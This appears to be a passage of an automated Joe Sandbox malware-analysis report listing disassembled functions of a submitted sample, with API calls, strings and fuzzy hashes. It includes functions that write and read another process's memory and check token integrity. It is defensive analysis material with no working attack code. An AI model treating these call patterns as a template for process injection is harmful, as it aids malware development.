Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 8fad70324c9a629f053165abe02b31c87845e51d78ee5e628655f24163d37dcc
Instruction ID: 45205afcb4b056bbfcd220026ace298bf8d7367435dcc35660cd2db4ee9791f4
Opcode Fuzzy Hash: 8fad70324c9a629f053165abe02b31c87845e51d78ee5e628655f24163d37dcc
Instruction Fuzzy Hash: A1213E30800609EBDF219F25DD4476D7BB9EB01721F148226E8519B9F0DBB599A2DFA0

Function 00AFBC9E Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 00AFBCB3
_memcmp.LIBCMT ref: 00AFBCD1
_memcmp.LIBCMT ref: 00AFBCE4
_memcmp.LIBCMT ref: 00AFBCFC
_memcmp.LIBCMT ref: 00AFBD14

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: e97894b97bbd97ff1c873826ac30c0a396d1ed210b5c1ed620c3b85e9e030ac7
Instruction ID: 12125696cdf5ee2d2e4526baa3d3009077011b1e084852102f50f842ede7255d
Opcode Fuzzy Hash: e97894b97bbd97ff1c873826ac30c0a396d1ed210b5c1ed620c3b85e9e030ac7
Instruction Fuzzy Hash: 940192F171010D7BE2086B51EE42FBBB3BCDE15788F144025FE1596243EB60EE1182B1

Function 00B04A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00B04ABA
__beginthreadex.LIBCMT ref: 00B04AD8
MessageBoxW.USER32(?,?,?,?), ref: 00B04AED
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00B04B03
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00B04B0A

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: 388c2bf41facd72be6fc744fd388e3a1b3c8403dabf2b46b09f34f2c6e70db40
Instruction ID: ce833ceceb934278f607b6eacdeef119433d321ae5b52fa82ec084756f5201ee
Opcode Fuzzy Hash: 388c2bf41facd72be6fc744fd388e3a1b3c8403dabf2b46b09f34f2c6e70db40
Instruction Fuzzy Hash: 981108B6904605BBC7219FA8DC04BAB7FECEB45325F1442A9F914D32E0DBB5C9108BA0

Function 00AF8202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00AF821E
GetLastError.KERNEL32(?,00AF7CE2,?,?,?), ref: 00AF8228
GetProcessHeap.KERNEL32(00000008,?,?,00AF7CE2,?,?,?), ref: 00AF8237
HeapAlloc.KERNEL32(00000000,?,00AF7CE2,?,?,?), ref: 00AF823E
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00AF8255

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 1fa8c1168035fbfff58a136fce884b91b7b4ca24e0cab08b130153d13bafc758
Instruction ID: d339d641783d64f23ddfb3e6b9e782dbe81133cb6324208f545b986bc42c60f9
Opcode Fuzzy Hash: 1fa8c1168035fbfff58a136fce884b91b7b4ca24e0cab08b130153d13bafc758
Instruction Fuzzy Hash: C9014671600209AFDB204FA6DC48DBB7BBCEF9A795B500439FA19D3220DF359C11CA60

Function 00AF710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AF7044,80070057,?,?,?,00AF7455), ref: 00AF7127
ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AF7044,80070057,?,?), ref: 00AF7142
lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AF7044,80070057,?,?), ref: 00AF7150
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AF7044,80070057,?), ref: 00AF7160
CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AF7044,80070057,?,?), ref: 00AF716C

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 65734095ca9d07954669cacbdc52cc124f939cfd49643a9a7a28b70e0401dd68
Instruction ID: 2df859604991186b2453428ea3a13c959b30c2e0229c26b5c16ba5a34279e007
Opcode Fuzzy Hash: 65734095ca9d07954669cacbdc52cc124f939cfd49643a9a7a28b70e0401dd68
Instruction Fuzzy Hash: 66017C72601209ABDB218FA4DC44ABEBBBDEB44791F140274FE04D7220DB31DD569BA0

Function 00B05244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B05260
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00B0526E
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B05276
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00B05280
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B052BC

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 65f3708bd05aafba85485e434a446395f6130f135b0b0f6d539423dae72cf56e
Instruction ID: 6077724f5e167d7aca4d1cb70a796d4ce181a1a794ea48a03fad7d2590f15038
Opcode Fuzzy Hash: 65f3708bd05aafba85485e434a446395f6130f135b0b0f6d539423dae72cf56e
Instruction Fuzzy Hash: 95013931D01A1ADBDF20AFA4E8485EEBBB8FF09711F4000AAE941B2580CF3055618BA1

Function 00AF810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00AF8121
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00AF812B
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00AF813A
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00AF8141
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00AF8157

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: c99658d3953481b29fd86d84f527a0d77d64a935181c842e6f3f25708c491e39
Instruction ID: bc32790c2dbcbb853c60ff46aa16fe48c4272855647f60ca54359d93fced771c
Opcode Fuzzy Hash: c99658d3953481b29fd86d84f527a0d77d64a935181c842e6f3f25708c491e39
Instruction Fuzzy Hash: B9F04F71200309AFEB210FA5EC88E773BBCEF49B55B000235FB45D7150CF659952DA64

Function 00AFC1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00AFC1F7
GetWindowTextW.USER32(00000000,?,00000100), ref: 00AFC20E
MessageBeep.USER32(00000000), ref: 00AFC226
KillTimer.USER32(?,0000040A), ref: 00AFC242
EndDialog.USER32(?,00000001), ref: 00AFC25C

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 0cef186fb778bcbd4cb4f6447a6831a303201104e865341e74629235bd7ba20f
Instruction ID: fa2a5612cff0495e841e3b0cc9f49989e9036d22ae733d4066dde5629d0d1ebf
Opcode Fuzzy Hash: 0cef186fb778bcbd4cb4f6447a6831a303201104e865341e74629235bd7ba20f
Instruction Fuzzy Hash: 1F01A73040430D97EB316B91DE4EFF67778FB00B05F00026DB642A24E1DBE46949DB50

Function 00AA13B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 00AA13BF
StrokeAndFillPath.GDI32(?,?,00ADB888,00000000,?), ref: 00AA13DB
SelectObject.GDI32(?,00000000), ref: 00AA13EE
DeleteObject.GDI32 ref: 00AA1401
StrokePath.GDI32(?), ref: 00AA141C

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 971aedf1e1a670b47750f1f9401bbe8289086c767122c079acb2080a1a582152
Instruction ID: 9f243532574bd81ae53287c8aec4c4a4e954a5265a9ff54bf109813dcb457ec6
Opcode Fuzzy Hash: 971aedf1e1a670b47750f1f9401bbe8289086c767122c079acb2080a1a582152
Instruction Fuzzy Hash: EFF0CD30004609EBDB315F1AED4CB693BB5A742326F088235E4694B4F1CB7945A6DF50

Function 00B0C397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00B0C432
CoCreateInstance.OLE32(00B32D6C,00000000,00000001,00B32BDC,?), ref: 00B0C44A

Part of subcall function 00AA7DE1: _memmove.LIBCMT ref: 00AA7E22

CoUninitialize.OLE32 ref: 00B0C6B7

Strings

.lnk, xrefs: 00B0C3C6, 00B0C3EE, 00B0C3F8

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: 4caa94dbc300b2b90cfef0c93840138703b0840bbb7c9adbd741e765257d4de9
Instruction ID: d165feb5b6545241653e2b6e249104ce594810bccd68c90bfc4566d7f7aab864
Opcode Fuzzy Hash: 4caa94dbc300b2b90cfef0c93840138703b0840bbb7c9adbd741e765257d4de9
Instruction Fuzzy Hash: C9A13971504205AFD700EF64C981EAFB7E8EF8A354F00496CF1559B1E2EB71EA49CB62

Function 00AB2CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 00AC0DB6: std::exception::exception.LIBCMT ref: 00AC0DEC
Part of subcall function 00AC0DB6: __CxxThrowException@8.LIBCMT ref: 00AC0E01

Part of subcall function 00AA7DE1: _memmove.LIBCMT ref: 00AA7E22

Part of subcall function 00AA7A51: _memmove.LIBCMT ref: 00AA7AAB

__swprintf.LIBCMT ref: 00AB2ECD

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00AB2D66

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: a2e0325965dc854b6c88b673624b6a2c93f896188962ba41155c99401e89e82c
Instruction ID: 78fc13a4cd5a7027eb50d5f7833ebca53f124d18bcc5b895906e28fc5504a72c
Opcode Fuzzy Hash: a2e0325965dc854b6c88b673624b6a2c93f896188962ba41155c99401e89e82c
Instruction Fuzzy Hash: E3915C715082019FC714EF24C985EAFB7B8EF96750F00491EF4869B2A2EB30ED44CB52

Function 00B0B93B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AA4743,?,?,00AA37AE,?), ref: 00AA4770

CoInitialize.OLE32(00000000), ref: 00B0B9BB
CoCreateInstance.OLE32(00B32D6C,00000000,00000001,00B32BDC,?), ref: 00B0B9D4
CoUninitialize.OLE32 ref: 00B0B9F1

Part of subcall function 00AA9837: __itow.LIBCMT ref: 00AA9862
Part of subcall function 00AA9837: __swprintf.LIBCMT ref: 00AA98AC

Strings

.lnk, xrefs: 00B0B99D, 00B0B9AB

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: dc7a433c47d24326a18759c9d5a8e9a2e74a05ff61869878d54b248c2c2653e3
Instruction ID: 1ee45eb33079a56464874ea7ebc7d322553d13c775eaea910be521e1ff83a42b
Opcode Fuzzy Hash: dc7a433c47d24326a18759c9d5a8e9a2e74a05ff61869878d54b248c2c2653e3
Instruction Fuzzy Hash: DBA158756043059FCB10DF14C984E6ABBE5FF8A314F148998F8999B3A1CB31ED46CB91

Function 00AC501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00AC50AD

Part of subcall function 00AD00F0: __87except.LIBCMT ref: 00AD012B

Strings

pow, xrefs: 00AC5085, 00AC50A2

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: 03ffbbb11b459d598a0fa79460b2d696aa1a175a5bd1254984030cf8c8a9dd05
Instruction ID: 021d9dfe7b23a24f95bf0b51348d401a21ad4f632bf12c67233235cc0095c1f2
Opcode Fuzzy Hash: 03ffbbb11b459d598a0fa79460b2d696aa1a175a5bd1254984030cf8c8a9dd05
Instruction Fuzzy Hash: EB513971D096029ADB11B734C905FAE3BA4EB40710F248A5EF4D7C63A9EE349DC49A86

Function 00AB6192 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00AB6248
_memmove.LIBCMT ref: 00AB62E4
_memset.LIBCMT ref: 00AB6308

Strings

ERCP, xrefs: 00AB61B3

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: _memset$_memmove
String ID: ERCP
API String ID: 2532777613-1384759551
Opcode ID: b311c43e4ab00e5d21b21c8fd8f9a37353e83d4e3445c9f8be183c9829fdd5cb
Instruction ID: fa22ee74635df6c466935725a234d11113d079ec60bb15395ea0b1db7ae35579
Opcode Fuzzy Hash: b311c43e4ab00e5d21b21c8fd8f9a37353e83d4e3445c9f8be183c9829fdd5cb
Instruction Fuzzy Hash: 2A517171900709DBEB24CF95C941BEAB7F8EF44314F20456EE94ADB252E774AA44CB40

Function 00AF97F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B014BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00AF9296,?,?,00000034,00000800,?,00000034), ref: 00B014E6

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00AF983F

Part of subcall function 00B01487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00AF92C5,?,?,00000800,?,00001073,00000000,?,?), ref: 00B014B1

Part of subcall function 00B013DE: GetWindowThreadProcessId.USER32(?,?), ref: 00B01409
Part of subcall function 00B013DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00AF925A,00000034,?,?,00001004,00000000,00000000), ref: 00B01419
Part of subcall function 00B013DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00AF925A,00000034,?,?,00001004,00000000,00000000), ref: 00B0142F

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00AF98AC
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00AF98F9

Strings

@, xrefs: 00AF9911

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 56e5d586096efde7471c46990e14efb20807a0c775f301a8b0c78d60a8322866
Instruction ID: 4c370d227178ced2474fb090401d6e355b1d965daed1c7b901464902b3c0c736
Opcode Fuzzy Hash: 56e5d586096efde7471c46990e14efb20807a0c775f301a8b0c78d60a8322866
Instruction Fuzzy Hash: 0D414D7690021CBEDB14DFA4CC81EEEBBB8EB09300F104599FA55B7291DA706E45CBA0

Function 00B27946 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00B2F910,00000000,?,?,?,?), ref: 00B279DF
GetWindowLongW.USER32 ref: 00B279FC
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00B27A0C

Strings

SysTreeView32, xrefs: 00B279B1

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 2ff06ff83c5b25bed574626552e5485d57f9b4c4d2a28ad140bbb189ccaa9e75
Instruction ID: 4afa69146a2ed7503a3a7bad3470cf41692d23ecee67ad8febc9674f4a3489e4
Opcode Fuzzy Hash: 2ff06ff83c5b25bed574626552e5485d57f9b4c4d2a28ad140bbb189ccaa9e75
Instruction Fuzzy Hash: A231A031244216ABDB118E38DC45BEA77A9FB0A334F204725F879A31E0DB31ED918B54

Function 00B273D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00B27461
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00B27475
SendMessageW.USER32(?,00001002,00000000,?), ref: 00B27499

Strings

SysMonthCal32, xrefs: 00B2742C

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

